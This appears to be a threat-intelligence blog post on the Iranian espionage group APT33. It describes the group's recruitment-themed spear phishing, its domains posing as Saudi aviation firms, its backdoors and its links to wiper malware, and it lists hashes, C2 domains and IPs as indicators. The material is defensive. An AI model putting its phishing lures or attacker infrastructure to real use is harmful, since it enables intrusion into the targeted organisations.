v.txt/v.vbs

B2D13A336A3EB7BD27612BE7D4E334DF

dUpdateCheckers.base

4A7290A279E6F2329EDD0615178A11FF

hUpdateCheckers.base

841CE6475F271F86D0B5188E4F8BC6DB

cUpdateCheckers.bat

52CA9A7424B3CC34099AD218623A0979

dUpdateCheckers.ps1

BBDE33F5709CB1452AB941C08ACC775E

hUpdateCheckers.ps1

247B2A9FCBA6E9EC29ED818948939702

GoogleUpdateschecker.vbs

C87B0B711F60132235D7440ADD0360B0

hxxp://mumbai-m[.]site

POWRUNER C2

hxxp://dns-update[.]club

Malware Staging Server

CVE-2017-0199 exploit document

63D66D99E46FB93676A4F475A65566D8

94.23.172.164:80

Malware Staging Server

dupdatechecker.doc

D85818E82A6E64CA185EDFDDBA2D1B76

dupdatechecker.exe

C9F16F0BE8C77F0170B9B6CE876ED7FB

proxycheker[.]pro

C2

46.105.221.247

Has resolved mumbai-m[.]site & hpserver[.]online

148.251.55.110

Has resolved mumbai-m[.]site and dns-update[.]club

185.15.247.147

Has resolved dns-update[.]club

145.239.33.100

Has resolved dns-update[.]club

82.102.14.219

Has resolved ns2.dns-update[.]club & hpserver[.]online & anyportals[.]com

v7-hpserver.online.hta

E6AC6F18256C4DDE5BF06A9191562F82

dUpdateCheckers.base

3C63BFF9EC0A340E0727E5683466F435

hUpdateCheckers.base

EEB0FF0D8841C2EBE643FE328B6D9EF5

cUpdateCheckers.bat

FB464C365B94B03826E67EABE4BF9165

dUpdateCheckers.ps1

635ED85BFCAAB7208A8B5C730D3D0A8C

hUpdateCheckers.ps1

13B338C47C52DE3ED0B68E1CB7876AD2

googleupdateschecker.vbs

DBFEA6154D4F9D7209C1875B2D5D70D5

hpserver[.]online

C2

v7-anyportals.hta

EAF3448808481FB1FDBB675BC5EA24DE

dUpdateCheckers.base

42449DD79EA7D2B5B6482B6F0D493498

hUpdateCheckers.base

A3FCB4D23C3153DD42AC124B112F1BAE

dUpdateCheckers.ps1

EE1C482C41738AAA5964730DCBAB5DFF

hUpdateCheckers.ps1

E516C3A3247AF2F2323291A670086A8F

anyportals[.]com

C2

Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware

When discussing suspected Middle Eastern hacker groups with destructive capabilities, many automatically think of the suspected Iranian group that previously used SHAMOON – aka Disttrack – to target organizations in the Persian Gulf. However, over the past few years, we have been tracking a separate, less widely known suspected Iranian group with potential destructive capabilities, whom we call APT33. Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.

Recent investigations by FireEye’s Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of APT33’s operations, capabilities, and potential motivations. This blog highlights some of our analysis. Our detailed report on FireEye MySIGHT contains a more thorough review of our supporting evidence and analysis. We will also be discussing this threat group further during our webinar on Sept. 21 at 8 a.m. ET.

Targeting

APT33 has targeted organizations – spanning multiple industries – headquartered in the United States, Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.

From mid-2016 through early 2017, APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings.

During the same time period, APT33 also targeted a South Korean company involved in oil refining and petrochemicals. More recently, in May 2017, APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company.

We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis a vis Saudi Arabia.

We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies. Iran has expressed interest in growing their petrochemical industry and often posited this expansion in competition to Saudi petrochemical companies. APT33 may have targeted these organizations as a result of Iran’s desire to expand its own petrochemical production and improve its competitiveness within the region. 

The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups, indicating a common interest in the sectors across Iranian actors.

Figure 1 shows the global scope of APT33 targeting.


Figure 1: Scope of APT33 Targeting

Spear Phishing

APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals.

An example .hta file excerpt is provided in Figure 2. To the user, the file would appear as benign references to legitimate job postings; however, unbeknownst to the user, the .hta file also contained embedded code that automatically downloaded a custom APT33 backdoor.


Figure 2: Excerpt of an APT33 malicious .hta file

We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016. Many of the phishing emails appeared legitimate – they referenced a specific job opportunity and salary, provided a link to the spoofed company’s employment website, and even included the spoofed company’s Equal Opportunity hiring statement. However, in a few cases, APT33 operators left in the default values of the shell’s phishing module. These appear to be mistakes, as minutes after sending the emails with the default values, APT33 sent emails to the same recipients with the default values removed.

As shown in Figure 3, the “fake mail” phishing module in the ALFA Shell contains default values, including the sender email address (solevisible@gmail[.]com), subject line (“your site hacked by me”), and email body (“Hi Dear Admin”).


Figure 3: ALFA TEaM Shell v2-Fake Mail (Default)

Figure 4 shows an example email containing the default values the shell.


Figure 4: Example Email Generated by the ALFA Shell with Default Values

Domain Masquerading

APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training, maintenance and support for Saudi’s military and commercial fleet. Based on observed targeting patterns, APT33 likely used these domains in spear phishing emails to target victim organizations.    

The following domains masquerade as these organizations: Boeing, Alsalam Aircraft Company, Northrop Grumman Aviation Arabia (NGAAKSA), and Vinnell Arabia.

boeing.servehttp[.]com

alsalam.ddns[.]net

ngaaksa.ddns[.]net

ngaaksa.sytes[.]net

vinnellarabia.myftp[.]org

Boeing, Alsalam Aircraft company, and Saudia Aerospace Engineering Industries entered into a joint venture to create the Saudi Rotorcraft Support Center in Saudi Arabia in 2015 with the goal of servicing Saudi Arabia’s rotorcraft fleet and building a self-sustaining workforce in the Saudi aerospace supply base.

Alsalam Aircraft Company also offers military and commercial maintenance, technical support, and interior design and refurbishment services.

Two of the domains appeared to mimic Northrop Grumman joint ventures. These joint ventures – Vinnell Arabia and Northrop Grumman Aviation Arabia – provide aviation support in the Middle East, specifically in Saudi Arabia. Both Vinnell Arabia and Northrop Grumman Aviation Arabia have been involved in contracts to train Saudi Arabia’s Ministry of National Guard.

Identified Persona Linked to Iranian Government

We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries.

We assess an actor using the handle “xman_1365_x” may have been involved in the development and potential use of APT33’s TURNEDUP backdoor due to the inclusion of the handle in the processing-debugging (PDB) paths of many of TURNEDUP samples. An example can be seen in Figure 5.


Figure 5: “xman_1365_x" PDB String in TURNEDUP Sample

Xman_1365_x was also a community manager in the Barnamenevis Iranian programming and software engineering forum, and registered accounts in the well-known Iranian Shabgard and Ashiyane forums, though we did not find evidence to suggest that this actor was ever a formal member of the Shabgard or Ashiyane hacktivist groups.

Open source reporting links the “xman_1365_x” actor to the “Nasr Institute,” which is purported to be equivalent to Iran’s “cyber army” and controlled by the Iranian government. Separately, additional evidence ties the “Nasr Institute” to the 2011-2013 attacks on the financial industry, a series of denial of service attacks dubbed Operation Ababil. In March 2016, the U.S. Department of Justice unsealed an indictment that named two individuals allegedly hired by the Iranian government to build attack infrastructure and conduct distributed denial of service attacks in support of Operation Ababil. While the individuals and the activity described in indictment are different than what is discussed in this report, it provides some evidence that individuals associated with the “Nasr Institute” may have ties to the Iranian government.

Potential Ties to Destructive Capabilities and Comparisons with SHAMOON

One of the droppers used by APT33, which we refer to as DROPSHOT, has been linked to the wiper malware SHAPESHIFT. Open source research indicates SHAPESHIFT may have been used to target organizations in Saudi Arabia.

Although we have only directly observed APT33 use DROPSHOT to deliver the TURNEDUP backdoor, we have identified multiple DROPSHOT samples in the wild that drop SHAPESHIFT. The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration. Both DROPSHOT and SHAPESHIFT contain Farsi language artifacts, which indicates they may have been developed by a Farsi language speaker (Farsi is the predominant and official language of Iran).

While we have not directly observed APT33 use SHAPESHIFT or otherwise carry out destructive operations, APT33 is the only group that we have observed use the DROPSHOT dropper. It is possible that DROPSHOT may be shared amongst Iran-based threat groups, but we do not have any evidence that this is the case.

In March 2017, Kasperksy released a report that compared DROPSHOT (which they call Stonedrill) with the most recent variant of SHAMOON (referred to as Shamoon 2.0). They stated that both wipers employ anti-emulation techniques and were used to target organizations in Saudi Arabia, but also mentioned several differences. For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment. Kaspersky also noted the difference in resource language sections: SHAMOON embeds Arabic-Yemen language resources while DROPSHOT embeds Farsi (Persian) language resources.

We have also observed differences in both targeting and tactics, techniques and procedures (TTPs) associated with the group using SHAMOON and APT33. For example, we have observed SHAMOON being used to target government organizations in the Middle East, whereas APT33 has targeted several commercial organizations both in the Middle East and globally. APT33 has also utilized a wide range of custom and publicly available tools during their operations. In contrast, we have not observed the full lifecycle of operations associated with SHAMOON, in part due to the wiper removing artifacts of the earlier stages of the attack lifecycle.

Regardless of whether DROPSHOT is exclusive to APT33, both the malware and the threat activity appear to be distinct from the group using SHAMOON. Therefore, we assess there may be multiple Iran-based threat groups capable of carrying out destructive operations.

Additional Ties Bolster Attribution to Iran

APT33’s targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests, implying that the threat actor is most likely government sponsored. This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government.

The times of day that APT33 threat actors were active suggests that they were operating in a time zone close to 04:30 hours ahead of Coordinated Universal Time (UTC). The time of the observed attacker activity coincides with Iran’s Daylight Time, which is +0430 UTC.

APT33 largely operated on days that correspond to Iran’s workweek, Saturday to Wednesday. This is evident by the lack of attacker activity on Thursday, as shown in Figure 6. Public sources report that Iran works a Saturday to Wednesday or Saturday to Thursday work week, with government offices closed on Thursday and some private businesses operating on a half day schedule on Thursday. Many other Middle East countries have elected to have a Friday and Saturday weekend. Iran is one of few countries that subscribes to a Saturday to Wednesday workweek.

APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups. The publicly available backdoors and tools utilized by APT33 – including NANOCORE, NETWIRE, and ALFA Shell – are all available on Iranian hacking websites, associated with Iranian hackers, and used by other suspected Iranian threat groups. While not conclusive by itself, the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33’s familiarity with them and lends support to the assessment that APT33 may be based in Iran.


Figure 6: APT33 Interactive Commands by Day of Week

Outlook and Implications

Based on observed targeting, we believe APT33 engages in strategic espionage by targeting geographically diverse organizations across multiple industries. Specifically, the targeting of organizations in the aerospace and energy sectors indicates that the threat group is likely in search of strategic intelligence capable of benefitting a government or military sponsor. APT33’s focus on aviation may indicate the group’s desire to gain insight into regional military aviation capabilities to enhance Iran’s aviation capabilities or to support Iran’s military and strategic decision making. Their targeting of multiple holding companies and organizations in the energy sectors align with Iranian national priorities for growth, especially as it relates to increasing petrochemical production. We expect APT33 activity will continue to cover a broad scope of targeted entities, and may spread into other regions and sectors as Iranian interests dictate.

APT33’s use of multiple custom backdoors suggests that they have access to some of their own development resources, with which they can support their operations, while also making use of publicly available tools. The ties to SHAPESHIFT may suggest that APT33 engages in destructive operations or that they share tools or a developer with another Iran-based threat group that conducts destructive operations.

Appendix

Malware Family Descriptions

Malware Family

Description

Availability

DROPSHOT

Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware

Non-Public

NANOCORE

Publicly available remote access Trojan (RAT) available for purchase. It is a full-featured backdoor with a plugin framework

Public

NETWIRE

Backdoor that attempts to steal credentials from the local machine from a variety of sources and supports other standard backdoor features.

Public

TURNEDUP

Backdoor capable of uploading and downloading files, creating a reverse shell, taking screenshots, and gathering system information

Non-Public

Indicators of Compromise

APT33 Domains Likely Used in Initial Targeting

Domain

boeing.servehttp[.]com

alsalam.ddns[.]net

ngaaksa.ddns[.]net

ngaaksa.sytes[.]net

vinnellarabia.myftp[.]org

APT33 Domains / IPs Used for C2

C2 Domain

MALWARE

managehelpdesk[.]com

NANOCORE

microsoftupdated[.]com

NANOCORE

osupd[.]com

NANOCORE

mywinnetwork.ddns[.]net

NETWIRE

www.chromup[.]com

TURNEDUP

www.securityupdated[.]com

TURNEDUP

googlmail[.]net

TURNEDUP

microsoftupdated[.]net

TURNEDUP

syn.broadcaster[.]rocks

TURNEDUP

www.googlmail[.]net

TURNEDUP

Publicly Available Tools used by APT33

MD5

MALWARE

Compile Time (UTC)

3f5329cf2a829f8840ba6a903f17a1bf

NANOCORE

2017/1/11 2:20

10f58774cd52f71cd4438547c39b1aa7

NANOCORE

2016/3/9 23:48

663c18cfcedd90a3c91a09478f1e91bc

NETWIRE

2016/6/29 13:44

6f1d5c57b3b415edc3767b079999dd50

NETWIRE

2016/5/29 14:11

Unattributed DROPSHOT / SHAPESHIFT MD5 Hashes

MD5

MALWARE

Compile Time (UTC)

0ccc9ec82f1d44c243329014b82d3125

DROPSHOT

(drops SHAPESHIFT

n/a - timestomped

fb21f3cea1aa051ba2a45e75d46b98b8

DROPSHOT

n/a - timestomped

3e8a4d654d5baa99f8913d8e2bd8a184

SHAPESHIFT

2016/11/14 21:16:40

6b41980aa6966dda6c3f68aeeb9ae2e0

SHAPESHIFT

2016/11/14 21:16:40

APT33 Malware MD5 Hashes

MD5

MALWARE

Compile Time (UTC)

8e67f4c98754a2373a49eaf53425d79a

DROPSHOT (drops TURNEDUP)

2016/10/19 14:26

c57c5529d91cffef3ec8dadf61c5ffb2

TURNEDUP

2014/6/1 11:01

c02689449a4ce73ec79a52595ab590f6

TURNEDUP

2016/9/18 10:50

59d0d27360c9534d55596891049eb3ef

TURNEDUP

2016/3/8 12:34

59d0d27360c9534d55596891049eb3ef

TURNEDUP

2016/3/8 12:34

797bc06d3e0f5891591b68885d99b4e1

TURNEDUP

2015/3/12 5:59

8e6d5ef3f6912a7c49f8eb6a71e18ee2

TURNEDUP

2015/3/12 5:59

32a9a9aa9a81be6186937b99e04ad4be

TURNEDUP

2015/3/12 5:59

a272326cb5f0b73eb9a42c9e629a0fd8

TURNEDUP

2015/3/9 16:56

a813dd6b81db331f10efaf1173f1da5d

TURNEDUP

2015/3/9 16:56

de9e3b4124292b4fba0c5284155fa317

TURNEDUP

2015/3/9 16:56

a272326cb5f0b73eb9a42c9e629a0fd8

TURNEDUP

2015/3/9 16:56

b3d73364995815d78f6d66101e718837

TURNEDUP

2014/6/1 11:01

de7a44518d67b13cda535474ffedf36b

TURNEDUP

2014/6/1 11:01

b5f69841bf4e0e96a99aa811b52d0e90

TURNEDUP

2014/6/1 11:01

a2af2e6bbb6551ddf09f0a7204b5952e

TURNEDUP

2014/6/1 11:01

b189b21aafd206625e6c4e4a42c8ba76

TURNEDUP

2014/6/1 11:01

aa63b16b6bf326dd3b4e82ffad4c1338

TURNEDUP

2014/6/1 11:01

c55b002ae9db4dbb2992f7ef0fbc86cb

TURNEDUP

2014/6/1 11:01

c2d472bdb8b98ed83cc8ded68a79c425

TURNEDUP

2014/6/1 11:01

c6f2f502ad268248d6c0087a2538cad0

TURNEDUP

2014/6/1 11:01

c66422d3a9ebe5f323d29a7be76bc57a

TURNEDUP

2014/6/1 11:01

ae47d53fe8ced620e9969cea58e87d9a

TURNEDUP

2014/6/1 11:01

b12faab84e2140dfa5852411c91a3474

TURNEDUP

2014/6/1 11:01

c2fbb3ac76b0839e0a744ad8bdddba0e

TURNEDUP

2014/6/1 11:01

a80c7ce33769ada7b4d56733d02afbe5

TURNEDUP

2014/6/1 11:01

6a0f07e322d3b7bc88e2468f9e4b861b

TURNEDUP

2014/6/1 11:01

b681aa600be5e3ca550d4ff4c884dc3d

TURNEDUP

2014/6/1 11:01

ae870c46f3b8f44e576ffa1528c3ea37

TURNEDUP

2014/6/1 11:01

bbdd6bb2e8827e64cd1a440e05c0d537

TURNEDUP

2014/6/1 11:01

0753857710dcf96b950e07df9cdf7911

TURNEDUP

2013/4/10 10:43

d01781f1246fd1b64e09170bd6600fe1

TURNEDUP

2013/4/10 10:43

1381148d543c0de493b13ba8ca17c14f

TURNEDUP

2013/4/10 10:43